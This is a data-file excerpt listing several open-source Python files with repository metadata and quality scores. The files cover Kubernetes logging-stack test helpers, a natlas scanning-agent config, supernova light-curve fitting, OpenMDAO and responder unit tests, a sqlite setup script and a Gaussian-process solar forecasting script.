max_stars_repo_path
stringlengths
3
269
max_stars_repo_name
stringlengths
4
119
max_stars_count
int64
0
191k
id
stringlengths
1
7
content
stringlengths
6
1.05M
score
float64
0.23
5.13
int_score
int64
0
5
tests/k8s_handler.py
josebalius/go-spacemesh
586
1800
from datetime import datetime from kubernetes import client from kubernetes.client.rest import ApiException import os import time import yaml from tests import config as conf import tests.utils as ut def remove_clusterrole_binding(shipper_name, crb_name): # remove clusterrolebind k8s_client = client.RbacAuthorizationV1Api() try: k8s_client.delete_cluster_role_binding(crb_name) print(f"\nsuccessfully deleted: {crb_name}") except Exception as e: print(f"\n{shipper_name} cluster role binding deletion has failed, please manually delete {crb_name}:") print(f"kubectl delete clusterrolebinding {crb_name}") def filebeat_teardown(namespace): # remove clusterrolebind # TODO: find a solution for sharing the name both here and in the kube object crb_name = f"filebeat-cluster-role-binding-{namespace}" remove_clusterrole_binding("filebeat", crb_name) def fluent_bit_teardown(namespace): # remove clusterrolebind # TODO: find a solution for sharing the name both here and in the kube object crb_name = f"fluent-bit-clusterrole-binding-{namespace}" remove_clusterrole_binding("fluent-bit", crb_name) def add_elastic_cluster(namespace): print("\nDeploying ElasticSearch\n") add_deployment_dir(namespace, conf.ELASTIC_CONF_DIR) def add_filebeat_cluster(namespace): print("\nDeploying FileBeat\n") add_deployment_dir(namespace, conf.FILEBEAT_CONF_DIR) def add_fluent_bit_cluster(namespace): print("\nDeploying Fluent-bit\n") add_deployment_dir(namespace, conf.FLUENT_BIT_CONF_DIR) def add_kibana_cluster(namespace): print("\nDeploying Kibana\n") add_deployment_dir(namespace, conf.KIBANA_CONF_DIR) def add_logstash_cluster(namespace): print("\nDeploying LogStash\n") add_deployment_dir(namespace, conf.LOGSTASH_CONF_DIR) def add_deployment_dir(namespace, dir_path, delete=False): with open(os.path.join(dir_path, 'dep_order.txt')) as f: dep_order = f.readline() dep_lst = [x.strip() for x in dep_order.split(',')] print(dep_lst) phrases_to_replace = ["(?<!_)NAMESPACE", "REP_ES_USER", "REP_ES_PASS"] values_for_replacement = [namespace, conf.ES_USER_LOCAL, conf.ES_PASS_LOCAL] for filename in dep_lst: # replace all phrases with the actual values if exists modified_file_path, is_change = ut.duplicate_file_and_replace_phrases( dir_path, filename, f"{namespace}_{filename}", phrases_to_replace, values_for_replacement ) print(f"applying file: {filename}") with open(modified_file_path) as f: dep = yaml.safe_load(f) if modified_file_path != os.path.join(dir_path, filename) and is_change: # remove modified file ut.delete_file(modified_file_path) name = dep["metadata"]["name"] if dep['kind'] == 'StatefulSet': k8s_client = client.AppsV1Api() if not delete: k8s_client.create_namespaced_stateful_set(body=dep, namespace=namespace) else: k8s_client.delete_namespaced_stateful_set(name=name, namespace=namespace) elif dep['kind'] == 'DaemonSet': k8s_client = client.AppsV1Api() k8s_client.create_namespaced_daemon_set(body=dep, namespace=namespace) elif dep['kind'] == 'Deployment': k8s_client = client.AppsV1Api() k8s_client.create_namespaced_deployment(body=dep, namespace=namespace) elif dep['kind'] == 'Service': try: k8s_client = client.CoreV1Api() k8s_client.create_namespaced_service(body=dep, namespace=namespace) except ApiException as e: if e.status == 409: print(f"Service exists: {dep['metadata']['name']}") continue raise e elif dep['kind'] == 'PodDisruptionBudget': k8s_client = client.PolicyV1beta1Api() k8s_client.create_namespaced_pod_disruption_budget(body=dep, namespace=namespace) elif dep["kind"] == 'Role': k8s_client = client.RbacAuthorizationV1Api() k8s_client.create_namespaced_role(body=dep, namespace=namespace) elif dep["kind"] == 'ClusterRole': try: k8s_client = client.RbacAuthorizationV1Api() k8s_client.create_cluster_role(body=dep) except ApiException as e: if e.status == 409: print(f"cluster role already exists") continue raise e elif dep["kind"] == 'RoleBinding': k8s_client = client.RbacAuthorizationV1Api() dep["subjects"][0]["namespace"] = namespace k8s_client.create_namespaced_role_binding(body=dep, namespace=namespace) elif dep["kind"] == 'ClusterRoleBinding': k8s_client = client.RbacAuthorizationV1Api() try: k8s_client.create_cluster_role_binding(body=dep) except ApiException as e: if e.status == 409: print(f"cluster role binding already exists") continue raise e elif dep["kind"] == 'ConfigMap': k8s_client = client.CoreV1Api() k8s_client.create_namespaced_config_map(body=dep, namespace=namespace) elif dep["kind"] == 'ServiceAccount': k8s_client = client.CoreV1Api() k8s_client.create_namespaced_service_account(body=dep, namespace=namespace) print("\nDone\n") def remove_deployment_dir(namespace, dir_path): with open(os.path.join(dir_path, 'dep_order.txt')) as f: dep_order = f.readline() dep_lst = [x.strip() for x in dep_order.split(',')] print(dep_lst) for filename in dep_lst: print(f"deleting {filename}") with open(os.path.join(dir_path, filename)) as f: dep = yaml.safe_load(f) name = dep["metadata"]["name"] if dep['kind'] == 'StatefulSet': k8s_client = client.AppsV1Api() k8s_client.delete_namespaced_stateful_set(name=name, namespace=namespace) elif dep['kind'] == 'DaemonSet': k8s_client = client.AppsV1Api() k8s_client.delete_namespaced_daemon_set(name=name, namespace=namespace) elif dep['kind'] == 'Deployment': k8s_client = client.AppsV1Api() k8s_client.delete_namespaced_deployment(name=name, namespace=namespace) elif dep['kind'] == 'Service': k8s_client = client.CoreV1Api() k8s_client.delete_namespaced_service(name=name, namespace=namespace, grace_period_seconds=0) delete_func = k8s_client.delete_namespaced_service list_func = k8s_client.list_namespaced_service wait_for_namespaced_deletion(name, namespace, delete_func, list_func) elif dep['kind'] == 'PodDisruptionBudget': k8s_client = client.PolicyV1beta1Api() k8s_client.delete_namespaced_pod_disruption_budget(name=name, namespace=namespace) elif dep["kind"] == 'Role': k8s_client = client.RbacAuthorizationV1Api() k8s_client.delete_namespaced_role(name=name, namespace=namespace) elif dep["kind"] == 'RoleBinding': k8s_client = client.RbacAuthorizationV1Api() k8s_client.delete_namespaced_role_binding(name=name, namespace=namespace) elif dep["kind"] == 'ClusterRoleBinding': k8s_client = client.RbacAuthorizationV1Api() k8s_client.delete_cluster_role_binding(name=name) elif dep["kind"] == 'ConfigMap': k8s_client = client.CoreV1Api() k8s_client.delete_namespaced_config_map(name=name, namespace=namespace) elif dep["kind"] == 'ServiceAccount': k8s_client = client.CoreV1Api() k8s_client.delete_namespaced_service_account(name=name, namespace=namespace) print("\nDone\n") def wait_for_namespaced_deletion(name, namespace, deletion_func, list_func, timeout=15): deleted = False orig_timeout = timeout while not deleted: # find by name and delete requested item for item in list_func(namespace).items: if item.metadata.name == name: if timeout < 0: raise TimeoutError(f"{orig_timeout} was not enough for deleting item:\n{item}\n") deletion_func(name=name, namespace=namespace) print(f"service {name} was not deleted, retrying") time.sleep(1) timeout -= 1 # validate item was deleted for item in list_func(namespace).items: deleted = True if item.metadata.name == name: deleted = False return deleted def wait_for_daemonset_to_be_ready(name, namespace, timeout=None): wait_for_to_be_ready("daemonset", name, namespace, timeout=timeout) def resolve_read_status_func(obj_name): if obj_name == "daemonset": return client.AppsV1Api().read_namespaced_daemon_set_status else: raise ValueError(f"resolve_read_status_func: {obj_name} is not a valid value") def wait_for_to_be_ready(obj_name, name, namespace, timeout=None): start = datetime.now() while True: read_func = resolve_read_status_func(obj_name) resp = read_func(name=name, namespace=namespace) total_sleep_time = (datetime.now()-start).total_seconds() number_ready = resp.status.number_ready updated_number_scheduled = resp.status.updated_number_scheduled if number_ready and updated_number_scheduled and number_ready == updated_number_scheduled: print("Total time waiting for {3} {0} [size: {1}]: {2} sec".format(name, number_ready, total_sleep_time, obj_name)) break print("{0}/{1} pods ready {2} sec ".format(number_ready, updated_number_scheduled, total_sleep_time), end="\r") time.sleep(1) if timeout and total_sleep_time > timeout: raise Exception(f"Timeout waiting for {obj_name} to be ready")
2.15625
2
natlas-agent/config.py
m4rcu5/natlas
0
1801
import os from dotenv import load_dotenv class Config: # Current Version NATLAS_VERSION = "0.6.10" BASEDIR = os.path.abspath(os.path.dirname(__file__)) load_dotenv(os.path.join(BASEDIR, '.env')) def get_int(self, varname): tmp = os.environ.get(varname) if tmp: return int(tmp) return None def get_bool(self, varname): tmp = os.environ.get(varname) if tmp and tmp.upper() == "TRUE": return True if tmp and tmp.upper() == "FALSE": return False return None def __init__(self): # url of server to get/submit work from/to self.server = os.environ.get('NATLAS_SERVER_ADDRESS') or 'http://127.0.0.1:5000' # ignore warnings about SSL connections # you shouldn't ignore ssl warnings, but I'll give you the option # Instead, you should put the trusted CA certificate bundle on the agent and use the REQUESTS_CA_BUNDLE env variable self.ignore_ssl_warn = self.get_bool('NATLAS_IGNORE_SSL_WARN') or False # maximum number of threads to utilize self.max_threads = self.get_int('NATLAS_MAX_THREADS') or 3 # Are we allowed to scan local addresses? # By default, agents protect themselves from scanning their local network self.scan_local = self.get_bool('NATLAS_SCAN_LOCAL') or False # default time to wait for the server to respond self.request_timeout = self.get_int('NATLAS_REQUEST_TIMEOUT') or 15 # seconds # Maximum value for exponential backoff of requests, 5 minutes default self.backoff_max = self.get_int('NATLAS_BACKOFF_MAX') or 300 # seconds # Base value to begin the exponential backoff self.backoff_base = self.get_int('NATLAS_BACKOFF_BASE') or 1 # seconds # Maximum number of times to retry submitting data before giving up # This is useful if a thread is submitting data that the server doesn't understand for some reason self.max_retries = self.get_int('NATLAS_MAX_RETRIES') or 10 # Identification string that identifies the agent that performed any given scan # Used for database lookup and stored in scan output self.agent_id = os.environ.get("NATLAS_AGENT_ID") or None # Authentication token that agents can use to talk to the server API # Only needed if the server is configured to require agent authentication self.auth_token = os.environ.get("NATLAS_AGENT_TOKEN") or None # Optionally save files that failed to upload self.save_fails = self.get_bool("NATLAS_SAVE_FAILS") or False # Allow version overrides for local development # Necessary to test versioned host data templates before release self.version_override = os.environ.get("NATLAS_VERSION_OVERRIDE") or None self.sentry_dsn = os.environ.get("SENTRY_DSN") or None if self.version_override: self.NATLAS_VERSION = self.version_override
2.34375
2
rdr2019/mcmc_lc_jla_fit.py
rubind/host_unity
0
1802
import os import sys import click import pickle import sncosmo import numpy as np from astropy.table import Table DATA_PATH = '/home/samdixon/jla_light_curves/' def modify_error(lc, error_floor=0.): """Add an error floor of `error_floor` times the maximum flux of the band to each observation """ data = sncosmo.photdata.photometric_data(lc).normalized(zp=25., zpsys='ab') new_lc = {'time': data.time, 'band': data.band, 'flux': data.flux, 'fluxerr': data.fluxerr, 'zp': data.zp, 'zpsys': data.zpsys} for band in set(data.band): band_cut = data.band==band max_flux_in_band = np.max(data.flux[band_cut]) new_lc['fluxerr'][band_cut] = np.sqrt((error_floor*max_flux_in_band)**2+data.fluxerr[band_cut]**2) new_lc = Table(new_lc, meta=lc.meta) return new_lc def fit_lc_and_save(lc, model_name, save_dir, no_mc): name = lc.meta['SN'] model = sncosmo.Model(source=model_name, effects=[sncosmo.CCM89Dust()], effect_names=['mw'], effect_frames=['obs']) if type(name) is float: name = int(name) z = lc.meta['Z_HELIO'] mwebv = lc.meta['MWEBV'] bounds = {} try: t0 = float(lc.meta['DayMax'].split()[0]) bounds['t0'] = (t0-5, t0+5) except KeyError: try: t0 = np.mean(lc['Date']) bounds['t0'] = (min(lc['Date'])-20, max(lc['Date'])) except KeyError: t0 = np.mean(lc['time']) bounds['t0'] = (min(lc['time'])-20, max(lc['time'])) bounds['z'] = ((1-1e-4)*z, (1+1e-4)*z) for param_name in model.source.param_names[1:]: bounds[param_name] = (-50, 50) modelcov = model_name=='salt2' model.set(z=z, t0=t0, mwebv=mwebv) phase_range = (-15, 45) if model_name=='salt2' else (-10, 40) wave_range = (3000, 7000) if model_name=='salt2' else None save_path = os.path.join(save_dir, '{}.pkl'.format(name)) try: minuit_result, minuit_fit_model = sncosmo.fit_lc(lc, model, model.param_names[:-2], bounds=bounds, phase_range=phase_range, wave_range=wave_range, warn=False, modelcov=modelcov) if not no_mc: emcee_result, emcee_fit_model = sncosmo.mcmc_lc(sncosmo.select_data(lc, minuit_result['data_mask']), minuit_fit_model, model.param_names[:-2], guess_t0=False, bounds=bounds, warn=False, nwalkers=40, modelcov=modelcov) pickle.dump(emcee_result, open(save_path, 'wb')) else: pickle.dump(minuit_result, open(save_path, 'wb')) except: print('Fit to {} failed'.format(name)) sys.stdout.flush() def main(): model_name, start, finish, err_floor, no_mc = sys.argv[1:] start = int(start) finish = int(finish) err_floor = float(err_floor) no_mc = bool(int(no_mc)) if no_mc: save_dir = '/home/samdixon/host_unity/fitting/results_mw_reddening/jla_{}_{:02d}'.format(model_name, int(err_floor*100)) else: save_dir = '/home/samdixon/host_unity/fitting/results_mw_reddening_mcmc/jla_{}_{:02d}'.format(model_name, int(err_floor*100)) if not os.path.isdir(save_dir): os.makedirs(save_dir) lcs = [] for f in os.listdir(DATA_PATH)[int(start):int(finish)]: if f[:2] == 'lc': lc = sncosmo.read_lc(os.path.join(DATA_PATH, f), format='salt2', expand_bands=True, read_covmat=True) lc = modify_error(lc, err_floor) name = lc.meta['SN'] if type(name) is float: name = int(name) load_path = os.path.join(save_dir, '{}.pkl'.format(name)) try: pickle.load(open(load_path, 'rb')) print('{}: loaded'.format(name)) sys.stdout.flush() except IOError: print('Fitting {}'.format(name)) sys.stdout.flush() fit_lc_and_save(lc, model_name, save_dir, no_mc) else: continue if __name__=='__main__': main()
2.046875
2
openmdao/core/tests/test_system.py
toddrme2178/OpenMDAO
0
1803
""" Unit tests for the system interface.""" import unittest from six import assertRaisesRegex from six.moves import cStringIO import numpy as np from openmdao.api import Problem, Group, IndepVarComp, ExecComp from openmdao.test_suite.components.options_feature_vector import VectorDoublingComp from openmdao.utils.assert_utils import assert_rel_error, assert_warning class TestSystem(unittest.TestCase): def test_vector_context_managers(self): g1 = Group() g1.add_subsystem('Indep', IndepVarComp('a', 5.0), promotes=['a']) g2 = g1.add_subsystem('G2', Group(), promotes=['*']) g2.add_subsystem('C1', ExecComp('b=2*a'), promotes=['a', 'b']) model = Group() model.add_subsystem('G1', g1, promotes=['b']) model.add_subsystem('Sink', ExecComp('c=2*b'), promotes=['b']) p = Problem(model=model) p.set_solver_print(level=0) # Test pre-setup errors with self.assertRaises(Exception) as cm: inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(str(cm.exception), "Group: Cannot get vectors because setup has not yet been called.") with self.assertRaises(Exception) as cm: d_inputs, d_outputs, d_residuals = model.get_linear_vectors('vec') self.assertEqual(str(cm.exception), "Group: Cannot get vectors because setup has not yet been called.") p.setup() p.run_model() # Test inputs with original values inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(inputs['G1.G2.C1.a'], 5.) inputs, outputs, residuals = g1.get_nonlinear_vectors() self.assertEqual(inputs['G2.C1.a'], 5.) # Test inputs after setting a new value inputs, outputs, residuals = g2.get_nonlinear_vectors() inputs['C1.a'] = -1. inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(inputs['G1.G2.C1.a'], -1.) inputs, outputs, residuals = g1.get_nonlinear_vectors() self.assertEqual(inputs['G2.C1.a'], -1.) # Test outputs with original values inputs, outputs, residuals = model.get_nonlinear_vectors() self.assertEqual(outputs['G1.G2.C1.b'], 10.) inputs, outputs, residuals = g2.get_nonlinear_vectors() # Test outputs after setting a new value inputs, outputs, residuals = model.get_nonlinear_vectors() outputs['G1.G2.C1.b'] = 123. self.assertEqual(outputs['G1.G2.C1.b'], 123.) inputs, outputs, residuals = g2.get_nonlinear_vectors() outputs['C1.b'] = 789. self.assertEqual(outputs['C1.b'], 789.) # Test residuals inputs, outputs, residuals = model.get_nonlinear_vectors() residuals['G1.G2.C1.b'] = 99.0 self.assertEqual(residuals['G1.G2.C1.b'], 99.0) # Test linear d_inputs, d_outputs, d_residuals = model.get_linear_vectors('linear') d_outputs['G1.G2.C1.b'] = 10. self.assertEqual(d_outputs['G1.G2.C1.b'], 10.) # Test linear with invalid vec_name with self.assertRaises(Exception) as cm: d_inputs, d_outputs, d_residuals = model.get_linear_vectors('bad_name') self.assertEqual(str(cm.exception), "Group (<model>): There is no linear vector named %s" % 'bad_name') def test_set_checks_shape(self): indep = IndepVarComp() indep.add_output('a') indep.add_output('x', shape=(5, 1)) g1 = Group() g1.add_subsystem('Indep', indep, promotes=['a', 'x']) g2 = g1.add_subsystem('G2', Group(), promotes=['*']) g2.add_subsystem('C1', ExecComp('b=2*a'), promotes=['a', 'b']) g2.add_subsystem('C2', ExecComp('y=2*x', x=np.zeros((5, 1)), y=np.zeros((5, 1))), promotes=['x', 'y']) model = Group() model.add_subsystem('G1', g1, promotes=['b', 'y']) model.add_subsystem('Sink', ExecComp(('c=2*b', 'z=2*y'), y=np.zeros((5, 1)), z=np.zeros((5, 1))), promotes=['b', 'y']) p = Problem(model=model) p.setup() p.set_solver_print(level=0) p.run_model() msg = "Incompatible shape for '.*': Expected (.*) but got (.*)" num_val = -10 arr_val = -10*np.ones((5, 1)) bad_val = -10*np.ones((10)) inputs, outputs, residuals = g2.get_nonlinear_vectors() # # set input # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): inputs['C1.a'] = arr_val # assign scalar to array inputs['C2.x'] = num_val assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign array to array inputs['C2.x'] = arr_val assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): inputs['C2.x'] = bad_val # assign list to array inputs['C2.x'] = arr_val.tolist() assert_rel_error(self, inputs['C2.x'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): inputs['C2.x'] = bad_val.tolist() # # set output # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): outputs['C1.b'] = arr_val # assign scalar to array outputs['C2.y'] = num_val assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign array to array outputs['C2.y'] = arr_val assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): outputs['C2.y'] = bad_val # assign list to array outputs['C2.y'] = arr_val.tolist() assert_rel_error(self, outputs['C2.y'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): outputs['C2.y'] = bad_val.tolist() # # set residual # # assign array to scalar with assertRaisesRegex(self, ValueError, msg): residuals['C1.b'] = arr_val # assign scalar to array residuals['C2.y'] = num_val assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign array to array residuals['C2.y'] = arr_val assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign bad array shape to array with assertRaisesRegex(self, ValueError, msg): residuals['C2.y'] = bad_val # assign list to array residuals['C2.y'] = arr_val.tolist() assert_rel_error(self, residuals['C2.y'], arr_val, 1e-10) # assign bad list shape to array with assertRaisesRegex(self, ValueError, msg): residuals['C2.y'] = bad_val.tolist() def test_deprecated_solver_names(self): class DummySolver(): pass model = Group() # check nl_solver setter & getter msg = "The 'nl_solver' attribute provides backwards compatibility " \ "with OpenMDAO 1.x ; use 'nonlinear_solver' instead." with assert_warning(DeprecationWarning, msg): model.nl_solver = DummySolver() with assert_warning(DeprecationWarning, msg): solver = model.nl_solver self.assertTrue(isinstance(solver, DummySolver)) # check ln_solver setter & getter msg = "The 'ln_solver' attribute provides backwards compatibility " \ "with OpenMDAO 1.x ; use 'linear_solver' instead." with assert_warning(DeprecationWarning, msg): model.ln_solver = DummySolver() with assert_warning(DeprecationWarning, msg): solver = model.ln_solver self.assertTrue(isinstance(solver, DummySolver)) def test_deprecated_metadata(self): prob = Problem() prob.model.add_subsystem('inputs', IndepVarComp('x', shape=3)) prob.model.add_subsystem('double', VectorDoublingComp()) msg = "The 'metadata' attribute provides backwards compatibility " \ "with earlier version of OpenMDAO; use 'options' instead." with assert_warning(DeprecationWarning, msg): prob.model.double.metadata['size'] = 3 prob.model.connect('inputs.x', 'double.x') prob.setup() prob['inputs.x'] = [1., 2., 3.] prob.run_model() assert_rel_error(self, prob['double.y'], [2., 4., 6.]) def test_list_inputs_output_with_includes_excludes(self): from openmdao.test_suite.scripts.circuit_analysis import Resistor, Diode, Node, Circuit p = Problem() model = p.model model.add_subsystem('ground', IndepVarComp('V', 0., units='V')) model.add_subsystem('source', IndepVarComp('I', 0.1, units='A')) model.add_subsystem('circuit', Circuit()) model.connect('source.I', 'circuit.I_in') model.connect('ground.V', 'circuit.Vg') p.setup() p.run_model() # Inputs with no includes or excludes inputs = model.list_inputs(out_stream=None) self.assertEqual( len(inputs), 11) # Inputs with includes inputs = model.list_inputs(includes=['*V_out*'], out_stream=None) self.assertEqual( len(inputs), 3) # Inputs with includes matching a promoted name inputs = model.list_inputs(includes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 2) # Inputs with excludes inputs = model.list_inputs(excludes=['*V_out*'], out_stream=None) self.assertEqual( len(inputs), 8) # Inputs with excludes matching a promoted name inputs = model.list_inputs(excludes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 9) # Inputs with includes and excludes inputs = model.list_inputs(includes=['*V_out*'], excludes=['*Vg*'], out_stream=None) self.assertEqual( len(inputs), 1) # Outputs with no includes or excludes. Explicit only outputs = model.list_outputs(implicit=False, out_stream=None) self.assertEqual( len(outputs), 5) # Outputs with includes. Explicit only outputs = model.list_outputs(includes=['*I'], implicit=False, out_stream=None) self.assertEqual( len(outputs), 4) # Outputs with excludes. Explicit only outputs = model.list_outputs(excludes=['circuit*'], implicit=False, out_stream=None) self.assertEqual( len(outputs), 2) if __name__ == "__main__": unittest.main()
2.515625
3
code/src/db/create_db.py
fabiangunzinger/sample_project
0
1804
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import argparse import os import sqlite3 import sys import pandas as pd from src import config def parse_args(argv): parser = argparse.ArgumentParser() parser.add_argument('sample') parser.add_argument('replace') return parser.parse_args() def db_tables(connection): """List tables in database.""" res = pd.read_sql("select name from sqlite_master", connection) return res.name.values def create_database(sample): """Create database with tables for targets, outcomes, and predictions.""" db_name = f'{sample}.db' db_path = os.path.join(config.DATADIR, db_name) conn = sqlite3.connect(db_path) usr_name = f'users_{sample}.csv' usr_path = os.path.join(config.DATADIR, usr_name) users = pd.read_csv(usr_path) db_tbls = db_tables(conn) for tbl in ['decisions', 'outcomes', 'predictions']: if tbl not in db_tbls: users.to_sql(tbl, conn, index=False) conn.execute(f"create index idx_{tbl}_user_id on {tbl}(user_id)") def main(argv=None): if argv is None: argv = sys.argv[:1] args = parse_args(argv) create_database(args.sample) if __name__ == '__main__': sys.exit(main())
2.9375
3
tests/test_responder.py
craigderington/responder-persons-api
0
1805
# coding: utf-8 import pytest import app as service import yaml import responder from starlette.responses import PlainTextResponse @pytest.fixture def api(): return service.api def test_hello_world(api): r = api.requests.get("/api/v1.0/index") assert r.text == "Hello, World!" def test_basic_route(api): @api.route("/api/v1.0/index") def index(req, resp): resp.text = "Hello, World!" def test_requests_session(api): assert api.session() assert api.requests def test_json_media(api): dump = {"life": 42} @api.route("/") def media(req, resp): resp.media = dump r = api.requests.get("http://;/") assert "json" in r.headers["Content-Type"] assert r.json() == dump def test_yaml_media(api): dump = {"life": 42} @api.route("/") def media(req, resp): resp.media = dump r = api.requests.get("http://;/", headers={"Accept": "yaml"}) assert "yaml" in r.headers["Content-Type"] assert yaml.load(r.content) == dump def test_background(api): @api.route("/") def route(req, resp): @api.background.task def task(): import time time.sleep(3) task() api.text = "ok" r = api.requests.get(api.url_for(route)) assert r.ok def test_500_error(api): def catcher(req, exc): return PlainTextResponse("Suppressed error", 500) api.app.add_exception_handler(ValueError, catcher) @api.route("/api/v1.0/index") def view(req, resp): raise ValueError r = api.requests.get(api.url_for(view)) assert not r.ok assert r.content == b'Suppressed error' def test_404_error(api): r = api.requests.get("/api/v1.0/foo") assert r.status_code == responder.API.status_codes.HTTP_404
2.265625
2
examples/solar/p25_nonsparse_cmmgp.py
axdahl/SC-MMGP
0
1806
# -*- coding: utf-8 -*- """ Script to execute example covarying MMGP regression forecasting model with full Krhh. Inputs: Data training and test sets (dictionary pickle) Data for example: - normalised solar data for 25 sites for 15 minute forecast - N_train = 4200, N_test = 2276, P = 25, D = 51 - Xtr[:, :50] 2 recent lagged observations for each site in order - Xtr[:, 50] time index - link inputs is a 25x2 array (link inputs repeated for every group) with normalised lat,long for each site in order Model Options: - Sparse or full x-function covariance prior Krhh (set bool SPARSE_PRIOR) - Diagonal or Kronecker-structured variational posterior covariance Sr (set bool DIAG_POST) - Sparse or full posterior covariance (when Kronecker posterior; set bool SPARSE_POST) Current Settings (sparse covarying mmgp model with sparse Kronecker posterior): DIAG_POST = False SPARSE_PRIOR = False # set True for equivalent sparse scmmgp model SPARSE_POST = True Note on specifying group structure for F: Grouping occurs via block_struct, a nested list of grouping order Where functions [i] are independent i.e. in own block, set link_kernel[i] = link_inputs[i] = 1.0 See model class preamble and example below for further details. """ import os import numpy as np import pickle import pandas as pd import traceback import time import sklearn.cluster import csv import sys import mmgp from mmgp import likelihoods from mmgp import kernels import tensorflow as tf from mmgp import datasets from mmgp import losses from mmgp import util dpath = '/experiments/datasets/' dfile = 'p25_inputsdict.pickle' dlinkfile = 'p25_linkinputsarray.pickle' outdir = '/experiments/results/p25_nonsparse_cmmgp/' try: os.makedirs(outdir) except FileExistsError: pass def get_inputs(): """ inputsdict contains {'Yte': Yte, 'Ytr': Ytr, 'Xtr': Xtr, 'Xte': Xte} where values are np.arrays np. arrays are truncated to evenly split into batches of size = batchsize returns inputsdict, Xtr_link (ndarray, shape = [P, D_link_features]) """ with open(os.path.join(dpath, dfile), 'rb') as f: d_all = pickle.load(f) with open(os.path.join(dpath, dlinkfile), 'rb') as f: d_link = pickle.load(f) return d_all, d_link def init_z(train_inputs, num_inducing): # Initialize inducing points using clustering. mini_batch = sklearn.cluster.MiniBatchKMeans(num_inducing) cluster_indices = mini_batch.fit_predict(train_inputs) inducing_locations = mini_batch.cluster_centers_ return inducing_locations FLAGS = util.util.get_flags() BATCH_SIZE = FLAGS.batch_size LEARNING_RATE = FLAGS.learning_rate DISPLAY_STEP = FLAGS.display_step EPOCHS = FLAGS.n_epochs NUM_SAMPLES = FLAGS.mc_train PRED_SAMPLES = FLAGS.mc_test NUM_INDUCING = FLAGS.n_inducing NUM_COMPONENTS = FLAGS.num_components IS_ARD = FLAGS.is_ard TOL = FLAGS.opt_tol VAR_STEPS = FLAGS.var_steps DIAG_POST = False SPARSE_PRIOR = False SPARSE_POST = True # option for non-diag post MAXTIME = 1200 print("settings done") # define GPRN P and Q output_dim = 25 #P node_dim = 25 #Q lag_dim = 2 save_nlpds = False # If True saves samples of nlpds for n,p,s # extract dataset d, d_link = get_inputs() Ytr, Yte, Xtr, Xte = d['Ytr'], d['Yte'], d['Xtr'], d['Xte'] data = datasets.DataSet(Xtr.astype(np.float32), Ytr.astype(np.float32), shuffle=False) test = datasets.DataSet(Xte.astype(np.float32), Yte.astype(np.float32), shuffle=False) print("dataset created") # model config block rows (where P=Q): block all w.1, w.2 etc, leave f independent # order of block_struct is rows, node functions # lists required: block_struct, link_inputs, kern_link, kern #block_struct nested list of grouping order weight_struct = [[] for _ in range(output_dim)] for i in range(output_dim): row = list(range(i, i+output_dim*(node_dim-1)+1, output_dim)) row_0 = row.pop(i) # bring diag to pivot position weight_struct[i] = [row_0] + row nodes = [[x] for x in list(range(output_dim * node_dim, output_dim * node_dim + output_dim))] block_struct = weight_struct + nodes # create link inputs (link inputs used repeatedly but can have link input per group) # permute to bring diagonal to first position link_inputs = [[] for _ in range(output_dim)] for i in range(output_dim): idx = list(range(d_link.shape[0])) link_inputs[i] = d_link[[idx.pop(i)] + idx, :] link_inputs = link_inputs + [1.0 for i in range(output_dim)] # for full W row blocks, independent nodes # create 'between' kernel list klink_rows = [kernels.CompositeKernel('mul',[kernels.RadialBasis(2, std_dev=2.0, lengthscale=1.0, white=0.01, input_scaling = IS_ARD), kernels.CompactSlice(2, active_dims=[0,1], lengthscale = 2.0, input_scaling = IS_ARD)] ) for i in range(output_dim) ] klink_f = [1.0 for i in range(node_dim)] kernlink = klink_rows + klink_f # create 'within' kernel # kern lag_active_dims_s = [ [] for _ in range(output_dim)] for i in range(output_dim): lag_active_dims_s[i] = list(range(lag_dim*i, lag_dim*(i+1))) k_rows = [kernels.CompositeKernel('mul',[kernels.RadialBasisSlice(lag_dim, active_dims=lag_active_dims_s[i], std_dev = 1.0, white = 0.01, input_scaling = IS_ARD), kernels.PeriodicSliceFixed(1, active_dims=[Xtr.shape[1]-1], lengthscale=0.5, std_dev=1.0, period = 144) ]) for i in range(output_dim)] k_f = [kernels.RadialBasisSlice(lag_dim, active_dims=lag_active_dims_s[i], std_dev = 1.0, white = 0.01, input_scaling = IS_ARD) for i in range(output_dim)] kern = k_rows + k_f print('len link_inputs ',len(link_inputs)) print('len kernlink ',len(kernlink)) print('len kern ', len(kern)) print('no. groups = ', len(block_struct), 'no. latent functions =', len([i for b in block_struct for i in b])) print('number latent functions', node_dim*(output_dim+1)) likelihood = likelihoods.CovaryingRegressionNetwork(output_dim, node_dim, std_dev = 0.2) # p, q, lik_noise print("likelihood and kernels set") Z = init_z(data.X, NUM_INDUCING) print('inducing points set') m = mmgp.ExplicitSCMMGP(output_dim, likelihood, kern, kernlink, block_struct, Z, link_inputs, num_components=NUM_COMPONENTS, diag_post=DIAG_POST, sparse_prior=SPARSE_PRIOR, sparse_post=SPARSE_POST, num_samples=NUM_SAMPLES, predict_samples=PRED_SAMPLES) print("model set") # initialise losses and logging error_rate = losses.RootMeanSqError(data.Dout) os.chdir(outdir) with open("log_results.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'fit_runtime', 'nelbo', error_rate.get_name(),'generalised_nlpd']) with open("log_params.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'raw_kernel_params', 'raw_kernlink_params', 'raw_likelihood_params', 'raw_weights']) with open("log_comp_time.csv", 'w', newline='') as f: csv.writer(f).writerow(['epoch', 'batch_time', 'nelbo_time', 'pred_time', 'gen_nlpd_time', error_rate.get_name()+'_time']) 